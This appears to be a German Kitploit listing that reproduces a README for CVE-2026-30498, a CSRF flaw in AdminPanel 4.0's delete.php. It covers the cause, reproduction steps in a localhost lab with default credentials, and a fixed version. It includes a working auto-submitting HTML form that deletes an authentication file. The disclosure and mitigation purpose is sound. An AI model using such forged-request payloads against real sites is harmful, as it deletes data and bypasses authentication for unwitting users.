Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-30498 — Bildungsorientierte CSRF-Schwachstellendemonstration mit einer kontrollierten Laborumgebung, einschließlich eines Proof-of-Concept-Exploits und einer korrigierten Version mit ordnungsgemäßen CSRF-Schutzmaßnahmen. | Kitploit
Tools/GitHubGitHub/mehdi-ben-hamou/cve-2026-30498
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsLernen & BildungLabs & Praxis
GitHubmehdi-ben-hamou/cve-2026-30498

CVE-2026-30498

Bildungsorientierte CSRF-Schwachstellendemonstration mit einer kontrollierten Laborumgebung, einschließlich eines Proof-of-Concept-Exploits und einer korrigierten Version mit ordnungsgemäßen CSRF-Schutzmaßnahmen.

Repository anzeigen
1vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-30498 – CSRF-Schwachstelle (AdminPanel 4.0)


Übersicht

CVE-ID: CVE-2026-30498 (von MITRE reserviert)
Entdecker: Mehdi Ben Hamou

Eine Cross-Site-Request-Forgery (CSRF)-Schwachstelle besteht im delete.php-Endpunkt von AdminPanel 4.0.

Diese Schwachstelle ermöglicht es einem Angreifer, sensible Aktionen (Dateilöschung) im Namen eines authentifizierten Benutzers ohne dessen Zustimmung auszulösen.


Technische Details

Die Schwachstelle wird durch das Fehlen von CSRF-Schutzmechanismen verursacht:

  • Keine CSRF-Token-Validierung
  • Keine Origin-/Referer-Validierung
  • Sensible Aktion über GET-Anfrage verfügbar
  • Keine Überprüfung der Benutzerabsicht

Der anfällige Endpunkt verarbeitet Anfragen direkt auf Basis der Benutzersitzung, ohne die Quelle der Anfrage zu validieren.


Auswirkungen

Eine erfolgreiche Ausnutzung führt zu:

  • Löschung von verifyPanel.php
  • Umgehung der Authentifizierung
  • Anwendung wechselt in den Setup-Modus
  • Vollständige Systemreinitialisierung möglich

  • Betroffene Version

    • AdminPanel 4.0 und frühere Versionen (archiviertes Projekt)

    Angriffsszenario

    Ein Angreifer hostet eine bösartige Webseite, die eine gefälschte Anfrage sendet:

    root@kitploit:~
    http://localhost:8080/delete.php?file=verifyPanel.php
    

    Wenn ein Opfer (authentifizierter Benutzer) diese Seite besucht, fügt der Browser automatisch Sitzungscookies hinzu und die Anfrage wird ausgeführt.


    Proof of Concept (PoC)

    Bösartige Seite (Angreifer)

    root@kitploit:~
    <form id="csrfForm" action="http://localhost:8080/delete.php" method="GET">
      <input type="hidden" name="file" value="verifyPanel.php">
    </form>
    <script>
      document.getElementById("csrfForm").submit();
    </script>
    

    Diese Anfrage wird automatisch mit dem Sitzungscookie des Opfers gesendet.


    Schritte zur Reproduktion

    1. Starten Sie den Opfer-Server:
    root@kitploit:~
    php -S localhost:8080
    
    1. Rufen Sie die Anmeldeseite auf:
    root@kitploit:~
    http://localhost:8080
    
    1. Melden Sie sich an mit:
    root@kitploit:~
    admin / admin123
    
    1. Öffnen Sie die Angreifer-Seite:
    root@kitploit:~
    http://localhost:8081/evil.html
    
    1. Starten Sie den CSRF-Angriff
    2. Kehren Sie zum Dashboard zurück:
    root@kitploit:~
    /panel/dashboard.php
    

    Was intern passiert

    1. Das Opfer meldet sich an → Sitzungscookie wird erstellt
    2. Die Angreifer-Seite sendet eine gefälschte Anfrage
    3. Der Browser fügt automatisch das Cookie hinzu
    4. Der Server führt die Löschung ohne Überprüfung aus
    5. Das System erkennt die fehlende Authentifizierungsdatei
    6. Die Anwendung wechselt in den Setup-Modus

    Laborumgebung (Pädagogische Simulation)

    Dieses Repository enthält eine kontrollierte Laborumgebung, um die Schwachstelle sicher zu reproduzieren.

    Wichtig: Dieses Labor ist eine Simulation und stellt nicht den exakten ursprünglichen AdminPanel-Code dar.

    Labor zurücksetzen

    Um die Umgebung zurückzusetzen:

    root@kitploit:~
    /reset.php
    

    Behobene Version (Schadensbegrenzung)

    Eine sichere Version ist implementiert in:

    root@kitploit:~
    delete_fixed.php
    

    Hinzugefügte Schutzmechanismen:

    • ✅ CSRF-Token-Validierung
    • ✅ Nur POST-Methode
    • ✅ Origin-/Referer-Validierung
    • ✅ Sitzungsvalidierung

    Warum der Fix funktioniert

    • Der Angreifer kann nicht auf das CSRF-Token zugreifen (Same-Origin-Policy)
    • Gefälschte Anfragen haben kein gültiges Token → werden abgelehnt
    • Cross-Origin-Anfragen werden über die Origin-Prüfung blockiert

    Projektstruktur

    root@kitploit:~
    victim/
    ├── index.php
    ├── delete.php
    ├── delete_fixed.php
    ├── reset.php
    └── panel/
        └── dashboard.php
    
    attacker/
    └── evil.html
    

    Haftungsausschluss

    Dieses Projekt ist ausschließlich für Bildungs- und Forschungszwecke bestimmt.
    Verwenden Sie diese Schwachstelle nicht auf Systemen ohne entsprechende Autorisierung.

    Tool herunterladen